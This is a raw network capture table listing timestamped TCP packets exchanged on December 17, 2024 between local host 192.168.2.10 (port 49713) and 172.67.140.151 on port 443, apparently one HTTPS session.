                                                                                    Dec 17, 2024 08:38:34.034265995 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.173787117 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.173816919 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.173891068 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.173891068 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.173906088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.173969984 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.181330919 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.181351900 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.181479931 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.181492090 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.181536913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.189187050 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.189205885 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.189286947 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.189286947 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.189297915 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.189347029 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.195934057 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.195954084 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.196204901 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.196216106 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.196278095 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.203567028 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.203583002 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.203686953 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.203697920 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.203953028 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.210774899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.210793018 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.210952044 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.210963011 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.211041927 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.218436003 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.218452930 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.218586922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.218597889 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.218796015 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.226077080 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.226093054 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.226294041 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.226321936 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.226449966 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.366844893 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.366874933 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.367053986 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.367091894 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.367774963 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.373444080 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.373461962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.373608112 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.373617887 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.373686075 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.381154060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.381170988 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.381311893 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.381311893 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.381321907 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.381381989 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.388808966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.388823986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.389122009 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.389133930 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.389683962 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.395555973 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.395570993 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.395667076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.395677090 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.399818897 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.403836966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.403852940 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.404014111 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.404023886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.405150890 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.410515070 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.410532951 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.410646915 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.410657883 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.415117025 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.418320894 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.418338060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.418469906 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.418478966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.418534994 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.558829069 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.558856964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.559056044 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.559056997 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.559070110 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.559119940 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.565572977 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.565598011 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.566006899 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.566019058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.566291094 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.573244095 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.573263884 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.573363066 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.573364019 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.573371887 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.573503971 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.580809116 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.580828905 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.580902100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.580909967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.581002951 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.587497950 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.587516069 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.587631941 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.587641001 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.591197014 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.595854998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.595875025 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.596081972 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.596091986 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.596292019 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.602462053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.602480888 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.602597952 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.602607965 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.602725029 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.610199928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.610219002 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.610307932 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.610316992 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.610661030 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.750689983 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.750721931 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.750793934 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.750818014 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.750860929 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.750860929 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.757761955 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.757785082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.758601904 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.758625031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.758697033 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.765414000 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.765444994 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.765561104 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.765585899 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.765672922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.772118092 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.772134066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.772208929 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.772224903 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.772456884 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.779905081 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.779927015 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.780026913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.780026913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.780046940 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.780091047 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.787157059 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.787183046 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.787244081 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.787261009 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.787303925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.787303925 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.794887066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.794912100 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.795037985 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.795053005 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.795238018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.802544117 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.802567959 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.802637100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.802653074 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.802674055 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.802728891 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.942888021 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.942914009 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.942986012 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.943000078 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.943114996 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.950647116 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.950665951 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.950792074 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.950792074 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.950803041 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.951010942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.957309961 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.957326889 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.957412004 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.957431078 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.957592964 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.964981079 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.965003967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.965048075 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.965058088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.965243101 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.972794056 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.972814083 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.972883940 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.972894907 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.975615025 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.980165958 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.980185032 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.980277061 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:34.980288982 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:34.980391979 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.227046967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.227082014 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.227144003 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.227159977 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.227253914 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.346124887 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.346154928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.346210003 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.346229076 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.346282959 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.346282959 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.354713917 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.354741096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.354798079 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.354804993 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.354866028 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.355650902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.355670929 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.355729103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.355743885 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.355789900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.355789900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.357253075 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.357285976 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.357320070 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.357326031 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.357431889 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.358377934 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.358401060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.358455896 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.358463049 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.358551979 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.360017061 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.360037088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.360100031 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.360105991 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.360165119 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.360165119 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.361120939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.361140966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.361274958 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.361283064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.361335993 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.362802029 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.362823963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.362884045 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.362890959 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.362922907 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.362950087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.365427017 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.365458965 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.365499973 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.365505934 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.365561962 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.365586996 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.372735023 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.372760057 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.372945070 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.372952938 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.373012066 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.373632908 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.373651981 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.373697042 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.373703957 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.373811960 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.375252962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.375273943 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.375355959 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.375355959 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.375364065 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.375462055 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.376301050 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.376323938 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.376399040 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.376405954 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.376466990 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.377151012 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.377187014 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.377253056 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.377253056 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.377259970 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.378793955 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.378813982 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.378907919 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.378907919 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.378916979 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.379756927 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.379775047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.379863977 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.379863977 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.379873037 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.391171932 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.391199112 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.391647100 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.391658068 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.517446041 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.517481089 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.517527103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.517543077 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.517604113 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.524751902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.524768114 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.524787903 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.524801016 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.524815083 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.524828911 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.524835110 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.524852037 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.524877071 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.531518936 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.531531096 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.531548977 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.531558990 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.531567097 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.531572104 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.531577110 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.531599045 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.531683922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:35.539181948 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.539196968 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.539206982 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.539222002 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.539230108 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.539253950 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:35.539278030 CET49713443192.168.2.10172.67.140.151
